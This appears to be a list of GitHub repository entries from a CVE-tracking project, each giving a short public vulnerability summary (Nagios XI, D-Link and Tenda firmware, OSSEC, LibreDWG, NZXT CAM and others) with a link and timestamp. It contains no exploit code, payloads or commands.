**In Bender/ebee Charge Controllers in multiple versions are prone to Command injection via Web interface. An authenticated attacker could enter shell commands into some input fields. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34592](https://github.com/Live-Hack-CVE/CVE-2021-34592) create time: 2022-12-29T20:55:27Z

**In Bender/ebee Charge Controllers in multiple versions are prone to Cross-site Scripting. An authenticated attacker could write HTML Code into configuration values. These values are not properly escaped when displayed. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34590](https://github.com/Live-Hack-CVE/CVE-2021-34590) create time: 2022-12-29T20:55:23Z

**The affected device uses off-the-shelf software components that contain unpatched vulnerabilities. A malicious attacker with physical access to the affected device could exploit these vulnerabilities. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-38398](https://github.com/Live-Hack-CVE/CVE-2021-38398) create time: 2022-12-29T20:55:13Z

**In Apache Airflow versions 2.2.4 through 2.3.3, the `database` webserver session backend was susceptible to session fixation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38054](https://github.com/Live-Hack-CVE/CVE-2022-38054) create time: 2022-12-29T21:05:24Z

**Apache IoTDB grafana-connector version 0.13.0 contains an interface without authorization, which may expose the internal structure of database. Users should upgrade to version 0.13.1 which addresses this issue. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38370](https://github.com/Live-Hack-CVE/CVE-2022-38370) create time: 2022-12-29T21:04:57Z

**SchedMD Slurm 21.08.x through 20.11.x has Incorrect Access Control that leads to Information Disclosure. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29500](https://github.com/Live-Hack-CVE/CVE-2022-29500) create time: 2022-12-29T21:04:47Z

**SchedMD Slurm 21.08.x through 20.11.x has Incorrect Access Control that leads to Escalation of Privileges and code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29501](https://github.com/Live-Hack-CVE/CVE-2022-29501) create time: 2022-12-29T21:04:43Z

**SchedMD Slurm 21.08.x through 20.11.x has Incorrect Access Control that leads to Escalation of Privileges. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29502](https://github.com/Live-Hack-CVE/CVE-2022-29502) create time: 2022-12-29T21:04:40Z

**D-link DIR-816 A2_v1.10CNB04.img is vulnerable to Buffer Overflow via /goform/addRouting. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36620](https://github.com/Live-Hack-CVE/CVE-2022-36620) create time: 2022-12-29T21:04:32Z

**D-link DIR-816 A2_v1.10CNB04.img is vulnerable to Command injection via /goform/NTPSyncWithHost. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37125](https://github.com/Live-Hack-CVE/CVE-2022-37125) create time: 2022-12-29T21:04:28Z

**HashiCorp Boundary up to 0.10.1 did not properly perform data integrity checks to ensure the resources were associated with the correct scopes, allowing potential privilege escalation for authorized users of another scope. Fixed in Boundary 0.10.2. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36130](https://github.com/Live-Hack-CVE/CVE-2022-36130) create time: 2022-12-29T21:04:25Z

**Apache ShenYu Admin has insecure permissions, which may allow low-privilege administrators to modify high-privilege administrator's passwords. This issue affects Apache ShenYu 2.4.2 and 2.4.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37435](https://github.com/Live-Hack-CVE/CVE-2022-37435) create time: 2022-12-29T21:04:21Z

**This affects the package node-ipc from 10.1.1 and before 10.1.3. This package contains malicious code, that targets users with IP located in Russia or Belarus, and overwrites their files with a heart emoji. **Note**: from versions 11.0.0 onwards, instead of having malicious code directly in the source of this package, CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23812](https://github.com/Live-Hack-CVE/CVE-2022-23812) create time: 2022-12-29T21:04:17Z

**Novel-Plus v3.6.2 was discovered to contain a hard-coded JWT key located in the project config file. This vulnerability allows attackers to create a custom user session. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36672](https://github.com/Live-Hack-CVE/CVE-2022-36672) create time: 2022-12-29T21:04:08Z

**Apache OFBiz up to version 18.12.05 is vulnerable to Regular Expression Denial of Service (ReDoS) in the way it handles URLs provided by external, unauthenticated users. Upgrade to 18.12.06 or apply patches at https://issues.apache.org/jira/browse/OFBIZ-12599 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-29158](https://github.com/Live-Hack-CVE/CVE-2022-29158) create time: 2022-12-29T21:04:05Z

**Novel-Plus v3.6.2 was discovered to contain an arbitrary file download vulnerability via the background file download API. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36671](https://github.com/Live-Hack-CVE/CVE-2022-36671) create time: 2022-12-29T21:04:01Z

**123elf Lotus 1-2-3 before 1.0.0rc3 for Linux, and Lotus 1-2-3 R3 for UNIX and other platforms through 9.8.2, allow attackers to execute arbitrary code via a crafted worksheet. This occurs because of a stack-based buffer overflow in the cell format processing routines, as demonstrated by a certain function call from pro CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39843](https://github.com/Live-Hack-CVE/CVE-2022-39843) create time: 2022-12-29T21:03:57Z

**Interview Management System v1.0 was discovered to contain a SQL injection vulnerability via the component /interview/delete.php?action=questiondelete&id=. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38260](https://github.com/Live-Hack-CVE/CVE-2022-38260) create time: 2022-12-29T21:03:54Z

**Interview Management System v1.0 was discovered to contain a SQL injection vulnerability via the id parameter at /interview/editQuestion.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38255](https://github.com/Live-Hack-CVE/CVE-2022-38255) create time: 2022-12-29T21:03:50Z

**In D-Link DAP1650 v1.04 firmware, the fileaccess.cgi program in the firmware has a buffer overflow vulnerability caused by strncpy. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36588](https://github.com/Live-Hack-CVE/CVE-2022-36588) create time: 2022-12-29T21:03:46Z

**In TOTOLINK A3002R TOTOLINK-A3002R-He-V1.1.1-B20200824.0128 in the shadow.sample file, root is hardcoded in the firmware. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40111](https://github.com/Live-Hack-CVE/CVE-2022-40111) create time: 2022-12-29T21:03:43Z

**In Tenda G3 US_G3V3.0br_V15.11.0.6(7663)_EN_TDE, there is a buffer overflow vulnerability caused by strcpy in function 0x869f4 in the httpd binary. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36586](https://github.com/Live-Hack-CVE/CVE-2022-36586) create time: 2022-12-29T21:03:40Z

**In Tenda G3 US_G3V3.0br_V15.11.0.6(7663)_EN_TDE, in httpd binary, the addDhcpRule function has a buffer overflow caused by sscanf. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36585](https://github.com/Live-Hack-CVE/CVE-2022-36585) create time: 2022-12-29T21:03:28Z

**Nagios XI before v5.8.7 was discovered to contain a cross-site scripting (XSS) vulnerability via the ajax.php script in CCM 3.1.5. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38254](https://github.com/Live-Hack-CVE/CVE-2022-38254) create time: 2022-12-29T21:03:24Z

**Nagios XI v5.8.6 was discovered to contain a cross-site scripting (XSS) vulnerability via the System Performance Settings page under the Admin panel. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38251](https://github.com/Live-Hack-CVE/CVE-2022-38251) create time: 2022-12-29T21:03:20Z

**Nagios XI v5.8.6 was discovered to contain a SQL injection vulnerability via the mib_name parameter at the Manage MIBs page. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38250](https://github.com/Live-Hack-CVE/CVE-2022-38250) create time: 2022-12-29T21:03:17Z

**ZITADEL combines the ease of Auth0 and the versatility of Keycloak.**Actions**, introduced in ZITADEL **1.42.0** on the API and **1.56.0** for Console, is a feature, where users with role.`ORG_OWNER` are able to create Javascript Code, which is invoked by the system at certain points during the login. **Actions**, for CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36051](https://github.com/Live-Hack-CVE/CVE-2022-36051) create time: 2022-12-29T21:03:13Z

**All versions of iSTAR Ultra prior to version 6.8.9.CU01 are vulnerable to a command injection that could allow an unauthenticated user root access to the system. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-21941](https://github.com/Live-Hack-CVE/CVE-2022-21941) create time: 2022-12-29T21:03:09Z

**A flaw was found in the Linux kernel’s implementation of IO-URING. This flaw allows an attacker with local executable permission to create a string of requests that can cause a use-after-free flaw within the kernel. This issue leads to memory corruption and possible privilege escalation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1976](https://github.com/Live-Hack-CVE/CVE-2022-1976) create time: 2022-12-29T21:03:06Z

**Nagios XI v5.8.6 was discovered to contain a cross-site scripting (XSS) vulnerability via the MTR component in version 1.0.4. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38249](https://github.com/Live-Hack-CVE/CVE-2022-38249) create time: 2022-12-29T21:02:42Z

**Systematic FIX Adapter (ALFAFX) 2.4.0.25 13/09/2017 allows remote file inclusion via a UNC share pathname, and also allows absolute path traversal to local pathnames. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-39838](https://github.com/Live-Hack-CVE/CVE-2022-39838) create time: 2022-12-29T21:02:38Z

**Nagios XI before v5.8.7 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities at auditlog.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38248](https://github.com/Live-Hack-CVE/CVE-2022-38248) create time: 2022-12-29T21:02:35Z

**Nagios XI v5.8.6 was discovered to contain a cross-site scripting (XSS) vulnerability via the System Settings page under the Admin panel. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38247](https://github.com/Live-Hack-CVE/CVE-2022-38247) create time: 2022-12-29T21:02:31Z

**lpd daemon (in.lpd) in Solaris 8 and earlier allows remote attackers to execute arbitrary commands via a job request with a crafted control file that is not properly handled when lpd invokes a mail program. NOTE: this might be the same vulnerability as CVE-2000-1220. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2001-1583](https://github.com/Live-Hack-CVE/CVE-2001-1583) create time: 2022-12-29T19:36:43Z

**X509TrustManager in (1) Java Secure Socket Extension (JSSE) in SDK and JRE 1.4.0 through 1.4.0_01, (2) JSSE before 1.0.3, (3) Java Plug-in SDK and JRE 1.3.0 through 1.4.1, and (4) Java Web Start 1.0 through 1.2 incorrectly calls the isClientTrusted method when determining server trust, which results in improper validat CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2003-1229](https://github.com/Live-Hack-CVE/CVE-2003-1229) create time: 2022-12-29T19:36:51Z

**Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 9.2 MP1 has unknown impact and remote authenticated attack vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-2577](https://github.com/Live-Hack-CVE/CVE-2008-2577) create time: 2022-12-29T20:19:15Z

**Unspecified vulnerability in the WebLogic Server component in Oracle BEA Product Suite 10.0 and 9.2 MP1 has unknown impact and local attack vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2008-2578](https://github.com/Live-Hack-CVE/CVE-2008-2578) create time: 2022-12-29T20:19:12Z

**A Type Confusion vulnerability in Autodesk Design Review 2018, 2017, 2013, 2012, 2011 can occur when processing a maliciously crafted PDF file. A malicious actor can leverage this to execute arbitrary code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-27038](https://github.com/Live-Hack-CVE/CVE-2021-27038) create time: 2022-12-29T20:20:12Z

**The dav_xml_get_cdata function in main/util.c in the mod_dav module in the Apache HTTP Server before 2.4.8 does not properly remove whitespace characters from CDATA sections, which allows remote attackers to cause a denial of service (daemon crash) via a crafted DAV WRITE request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-6438](https://github.com/Live-Hack-CVE/CVE-2013-6438) create time: 2022-12-29T19:30:58Z

**mod_session_dbd.c in the mod_session_dbd module in the Apache HTTP Server before 2.4.5 proceeds with save operations for a session without considering the dirty flag and the requirement for a new session ID, which has unspecified impact and remote attack vectors. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-2249](https://github.com/Live-Hack-CVE/CVE-2013-2249) create time: 2022-12-29T19:30:54Z

**mod_dav.c in the Apache HTTP Server before 2.2.25 does not properly determine whether DAV is enabled for a URI, which allows remote attackers to cause a denial of service (segmentation fault) via a MERGE request in which the URI is configured for handling by the mod_dav_svn module, but a certain href attribute in XML d CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1896](https://github.com/Live-Hack-CVE/CVE-2013-1896) create time: 2022-12-29T19:29:46Z

**mod_rewrite.c in the mod_rewrite module in the Apache HTTP Server 2.2.x before 2.2.25 writes data to a log file without sanitizing non-printable characters, which might allow remote attackers to execute arbitrary commands via an HTTP request containing an escape sequence for a terminal emulator. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-1862](https://github.com/Live-Hack-CVE/CVE-2013-1862) create time: 2022-12-29T19:29:42Z

**Race condition in the mod_status module in the Apache HTTP Server before 2.4.10 allows remote attackers to cause a denial of service (heap-based buffer overflow), or possibly obtain sensitive credential information or execute arbitrary code, via a crafted request that triggers improper scoreboard handling within the st CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0226](https://github.com/Live-Hack-CVE/CVE-2014-0226) create time: 2022-12-29T19:31:09Z

**The deflate_in_filter function in mod_deflate.c in the mod_deflate module in the Apache HTTP Server before 2.4.10, when request body decompression is enabled, allows remote attackers to cause a denial of service (resource consumption) via crafted request data that decompresses to a much larger size. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-0118](https://github.com/Live-Hack-CVE/CVE-2014-0118) create time: 2022-12-29T19:31:05Z

**An AVX-512-optimized implementation of the mempcpy function in the GNU C Library (aka glibc or libc6) 2.27 and earlier may write data beyond the target buffer, leading to a buffer overflow in __mempcpy_avx512_no_vzeroupper. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2018-11237](https://github.com/Live-Hack-CVE/CVE-2018-11237) create time: 2022-12-29T19:34:48Z

**The TSS (Tuple Space Search) algorithm in Open vSwitch 2.x through 2.17.2 and 3.0.0 allows remote attackers to cause a denial of service (delays of legitimate traffic) via crafted packet data that requires excessive evaluation time within the packet classification algorithm for the MegaFlow cache, aka a Tuple Space Exp CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-25076](https://github.com/Live-Hack-CVE/CVE-2019-25076) create time: 2022-12-29T19:35:38Z

**Firecracker vsock implementation buffer overflow in versions 0.18.0 and 0.19.0. This can result in potentially exploitable crashes. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2019-18960](https://github.com/Live-Hack-CVE/CVE-2019-18960) create time: 2022-12-29T19:34:45Z

**A privilege escalation vulnerability exists in the WinRing0x64 Driver Privileged I/O Write IRPs functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause increased privileges. Using the IRP 0x9c40a0e0 gives a low privilege user direct access to the OUT instruction that is completely unrest CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13514](https://github.com/Live-Hack-CVE/CVE-2020-13514) create time: 2022-12-29T20:16:55Z

**A privilege escalation vulnerability exists in the WinRing0x64 Driver IRP 0x9c40a148 functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause an adversary to obtain elevated privileges. An attacker can send a malicious IRP to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13515](https://github.com/Live-Hack-CVE/CVE-2020-13515) create time: 2022-12-29T20:16:52Z

**A privilege escalation vulnerability exists in the WinRing0x64 Driver IRP 0x9c402088 functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause increased privileges. An attacker can send a malicious IRP to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13519](https://github.com/Live-Hack-CVE/CVE-2020-13519) create time: 2022-12-29T20:16:48Z

**An information disclosure vulnerability exists in the WinRing0x64 Driver IRP 0x9c402084 functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13518](https://github.com/Live-Hack-CVE/CVE-2020-13518) create time: 2022-12-29T20:16:32Z

**A privilege escalation vulnerability exists in the WinRing0x64 Driver Privileged I/O Write IRPs functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause increased privileges. Using the IRP 0x9c40a0d8 gives a low privilege user direct access to the OUT instruction that is completely unrest CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13512](https://github.com/Live-Hack-CVE/CVE-2020-13512) create time: 2022-12-29T20:16:29Z

**A privilege escalation vulnerability exists in the WinRing0x64 Driver Privileged I/O Write IRPs functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause increased privileges. Using the IRP 0x9c40a0dc gives a low privilege user direct access to the OUT instruction that is completely unrest CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13513](https://github.com/Live-Hack-CVE/CVE-2020-13513) create time: 2022-12-29T20:16:25Z

**An information disclosure vulnerability exists in the WinRing0x64 Driver IRP 0x9c406144 functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13516](https://github.com/Live-Hack-CVE/CVE-2020-13516) create time: 2022-12-29T20:16:18Z

**An information disclosure vulnerability exists in the WinRing0x64 Driver IRP 0x9c406104 functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) can cause the disclosure of sensitive information. An attacker can send a malicious IRP to trigger this vulnerability. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13517](https://github.com/Live-Hack-CVE/CVE-2020-13517) create time: 2022-12-29T20:16:14Z

**An information disclosure vulnerability exists in the WinRing0x64 Driver Privileged I/O Read IRPs functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) using the IRP 0x9c4060d0 gives a low privilege user direct access to the IN instruction that is completely unrestrained at an elevated privilege CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13510](https://github.com/Live-Hack-CVE/CVE-2020-13510) create time: 2022-12-29T20:16:07Z

**An information disclosure vulnerability exists in the WinRing0x64 Driver Privileged I/O Read IRPs functionality of NZXT CAM 4.8.0. A specially crafted I/O request packet (IRP) using the IRP 0x9c4060d4 gives a low privilege user direct access to the IN instruction that is completely unrestrained at an elevated privilege CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-13511](https://github.com/Live-Hack-CVE/CVE-2020-13511) create time: 2022-12-29T20:15:48Z

**In OSSEC-HIDS 2.7 through 3.5.0, the OS_CleanMSG function in ossec-analysisd doesn't remove or encode terminal control characters or newlines from processed log messages. In many cases, those characters are later logged. Because newlines (\n) are permitted in messages processed by ossec-analysisd, it may be possible to CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8445](https://github.com/Live-Hack-CVE/CVE-2020-8445) create time: 2022-12-29T20:15:41Z

**In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to path traversal (with write access) via crafted syscheck messages written directly to the analysisd UNIX domain socket by a local user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8446](https://github.com/Live-Hack-CVE/CVE-2020-8446) create time: 2022-12-29T20:15:38Z

**In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to a use-after-free during processing of ossec-alert formatted msgs (received from authenticated remote agents and delivered to the analysisd processing queue by ossec-remoted). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8444](https://github.com/Live-Hack-CVE/CVE-2020-8444) create time: 2022-12-29T20:15:34Z

**In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to a use-after-free during processing of syscheck formatted msgs (received from authenticated remote agents and delivered to the analysisd processing queue by ossec-remoted). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8447](https://github.com/Live-Hack-CVE/CVE-2020-8447) create time: 2022-12-29T20:15:31Z

**In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to a heap-based buffer overflow in the rootcheck decoder component via an authenticated client. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8442](https://github.com/Live-Hack-CVE/CVE-2020-8442) create time: 2022-12-29T20:15:27Z

**In OSSEC-HIDS 2.7 through 3.5.0, the server component responsible for log analysis (ossec-analysisd) is vulnerable to a denial of service (NULL pointer dereference) via crafted messages written directly to the analysisd UNIX domain socket by a local user. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-8448](https://github.com/Live-Hack-CVE/CVE-2020-8448) create time: 2022-12-29T20:15:23Z

**GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in bfr_read in decode.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6614](https://github.com/Live-Hack-CVE/CVE-2020-6614) create time: 2022-12-29T20:15:19Z

**GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in bit_search_sentinel in bits.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6613](https://github.com/Live-Hack-CVE/CVE-2020-6613) create time: 2022-12-29T20:15:15Z

**GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in copy_compressed_bytes in decode_r2007.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6612](https://github.com/Live-Hack-CVE/CVE-2020-6612) create time: 2022-12-29T20:15:12Z

**GNU LibreDWG 0.9.3.2564 has a heap-based buffer over-read in read_pages_map in decode_r2007.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6609](https://github.com/Live-Hack-CVE/CVE-2020-6609) create time: 2022-12-29T20:15:08Z

**GNU LibreDWG 0.9.3.2564 has a NULL pointer dereference in get_next_owned_entity in dwg.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6611](https://github.com/Live-Hack-CVE/CVE-2020-6611) create time: 2022-12-29T20:15:04Z

**GNU LibreDWG 0.9.3.2564 has an invalid pointer dereference in dwg_dynapi_entity_value in dynapi.c (dynapi.c is generated by gen-dynapi.pl). CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-6615](https://github.com/Live-Hack-CVE/CVE-2020-6615) create time: 2022-12-29T20:15:00Z

**CSRF in admin/add-field.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to create a custom field via a crafted request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10484](https://github.com/Live-Hack-CVE/CVE-2020-10484) create time: 2022-12-29T20:14:57Z

**CSRF in admin/manage-comments.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to delete a comment via a crafted request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10486](https://github.com/Live-Hack-CVE/CVE-2020-10486) create time: 2022-12-29T20:14:43Z

**CSRF in admin/manage-articles.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to delete an article via a crafted request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10485](https://github.com/Live-Hack-CVE/CVE-2020-10485) create time: 2022-12-29T20:14:39Z

**CSRF in admin/ajax-hub.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to post a comment on any article via a crafted request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10483](https://github.com/Live-Hack-CVE/CVE-2020-10483) create time: 2022-12-29T20:14:36Z

**CSRF in admin/add-news.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new news article via a crafted request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10479](https://github.com/Live-Hack-CVE/CVE-2020-10479) create time: 2022-12-29T20:14:32Z

**CSRF in admin/add-template.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new article template via a crafted request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10482](https://github.com/Live-Hack-CVE/CVE-2020-10482) create time: 2022-12-29T20:14:29Z

**CSRF in admin/add-glossary.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to add a new glossary term via a crafted request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10481](https://github.com/Live-Hack-CVE/CVE-2020-10481) create time: 2022-12-29T20:14:26Z

**CSRF in admin/manage-settings.php in Chadha PHPKB Standard Multi-Language 9 allows attackers to change the global settings, potentially gaining code execution or causing a denial of service, via a crafted request. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2020-10478](https://github.com/Live-Hack-CVE/CVE-2020-10478) create time: 2022-12-29T20:14:22Z

**Buffer Overflow in Netgear R8000 Router with firmware v1.0.4.56 allows remote attackers to execute arbitrary code or cause a denial-of-service by sending a crafted POST to '/bd_genie_create_account.cgi' with a sufficiently long parameter 'register_country'. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34236](https://github.com/Live-Hack-CVE/CVE-2021-34236) create time: 2022-12-29T20:17:32Z

**An improper privilege management vulnerability [CWE-269] in FortiADC versions 6.2.1 and below, 6.1.5 and below, 6.0.4 and below, 5.4.5 and below and 5.3.7 and below may allow a remote authenticated attacker with restricted user profile to modify the system files using the shell access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-43076](https://github.com/Live-Hack-CVE/CVE-2021-43076) create time: 2022-12-29T20:12:16Z

**Lodash versions prior to 4.17.21 are vulnerable to Command Injection via the template function. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23337](https://github.com/Live-Hack-CVE/CVE-2021-23337) create time: 2022-12-29T19:34:35Z

**In MB connect line mymbCONNECT24, mbCONNECT24 and Helmholz myREX24 and myREX24.virtual in all versions through v2.11.2 an authenticated attacker can change the password of his account into a new password that violates the password policy by intercepting and modifying the request that is send to the server. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-34574](https://github.com/Live-Hack-CVE/CVE-2021-34574) create time: 2022-12-29T19:32:43Z

**A security issue in nginx resolver was identified, which might allow an attacker who is able to forge UDP packets from the DNS server to cause 1-byte memory overwrite, resulting in worker process crash or potential other impact. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-23017](https://github.com/Live-Hack-CVE/CVE-2021-23017) create time: 2022-12-29T19:31:59Z

**PCProtect Endpoint prior to v5.17.470 for Microsoft Windows lacks tamper protection, allowing authenticated attackers with Administrator privileges to modify processes within the application and escalate privileges to SYSTEM via a crafted executable. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36670](https://github.com/Live-Hack-CVE/CVE-2022-36670) create time: 2022-12-29T20:19:08Z

**Cynet 360 Web Portal before v4.5 was discovered to allow attackers to access a list of decoy users via a crafted GET request sent to /WebApp/DeceptionUser/GetAllDeceptionUsers. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27969](https://github.com/Live-Hack-CVE/CVE-2022-27969) create time: 2022-12-29T20:19:05Z

**Cynet 360 Web Portal before v4.5 was discovered to allow attackers to access a list of monitored files and profiles via a crafted GET request sent to /WebApp/SettingsFileMonitor/GetFileMonitorProfiles. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27968](https://github.com/Live-Hack-CVE/CVE-2022-27968) create time: 2022-12-29T20:19:01Z

**Cynet 360 Web Portal before v4.5 was discovered to allow attackers to access a list of excluded files and profiles via a crafted GET request sent to /WebApp/SettingsExclusion/GetExclusionsProfiles. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27967](https://github.com/Live-Hack-CVE/CVE-2022-27967) create time: 2022-12-29T20:18:58Z

**The Image Hover Effects Ultimate plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Media Image URL value that can be added to an Image Hover in versions up to, and including, 9.7.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers to i CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2935](https://github.com/Live-Hack-CVE/CVE-2022-2935) create time: 2022-12-29T20:18:54Z

**A vulnerability in the web-based management interface of AOS-CX could allow a remote unauthenticated attacker to fingerprint the exact version AOS-CX running on the switch. This allows an attacker to retrieve information which could be used to more precisely target the switch for further exploitation in ArubaOS-CX Swit CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23690](https://github.com/Live-Hack-CVE/CVE-2022-23690) create time: 2022-12-29T20:18:51Z

**Multiple vulnerabilities exist in the processing of packet data by the LLDP service of AOS-CX. Successful exploitation of these vulnerabilities may allow an attacker to impact the availability of the AOS-CX LLDP service and/or the management plane of the switch in ArubaOS-CX Switches version(s): AOS-CX 10.09.xxxx: 10.0 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-23688](https://github.com/Live-Hack-CVE/CVE-2022-23688) create time: 2022-12-29T20:18:47Z

**SilverwareGames.io is a social network for users to play video games online. In version 1.1.8 and prior, due to an unobvious feature of PHP, hashes generated by built-in functions and starting with the `0e` symbols were being handled as zero multiplied with the `e` number. Therefore, the hash value was equal to 0. The CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36072](https://github.com/Live-Hack-CVE/CVE-2022-36072) create time: 2022-12-29T20:18:44Z

